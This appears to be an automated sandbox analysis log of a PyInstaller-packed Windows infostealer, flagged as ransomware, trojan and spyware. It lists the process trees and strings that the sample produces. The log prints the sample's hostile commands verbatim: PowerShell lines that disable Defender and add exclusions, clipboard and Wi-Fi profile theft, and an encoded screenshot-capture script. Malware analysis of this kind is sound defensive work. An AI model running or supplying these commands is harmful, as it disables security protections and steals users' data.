              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037125137.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340140316.00007FF8A9398000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibsslH vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343212572.00007FF8B984C000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342965199.00007FF8B93D8000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341048034.00007FF8B8CC3000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336517828.00007FF8A86A9000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340442986.00007FF8B7EEE000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340792166.00007FF8B8B42000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339600779.00007FF8A8F2A000.00000004.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamepython312.dll. vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342336186.00007FF8B9094000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341984089.00007FF8B906C000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2333652744.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMDMAgentj% vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341701034.00007FF8B8F9C000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334206076.00007FF8A81AA000.00000004.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341319253.00007FF8B8CF3000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343410682.00007FF8B9F78000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343586290.00007FF8BA259000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs #U202f#U202f#U2005#U00a0.scr.exe
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
              Source: python312.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992524518674001
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9974527256801319
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9951941924283154
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@144/95@2/2
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE18560 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF73AE18560
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7ECB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,68_2_00007FF7F7ECB57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7E9EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,68_2_00007FF7F7E9EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7EA3144 GetDiskFreeSpaceExW,68_2_00007FF7F7EA3144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeMutant created: \Sessions\1\BaseNamedObjects\x
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882Jump to behavior
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: #U202f#U202f#U2005#U00a0.scr.exeReversingLabs: Detection: 71%
              Source: #U202f#U202f#U2005#U00a0.scr.exeVirustotal: Detection: 72%
              Source: #U202f#U202f#U2005#U00a0.scr.exeString found in binary or memory: set-addPolicy
              Source: #U202f#U202f#U2005#U00a0.scr.exeString found in binary or memory: id-cmc-addExtensions
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile read: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAG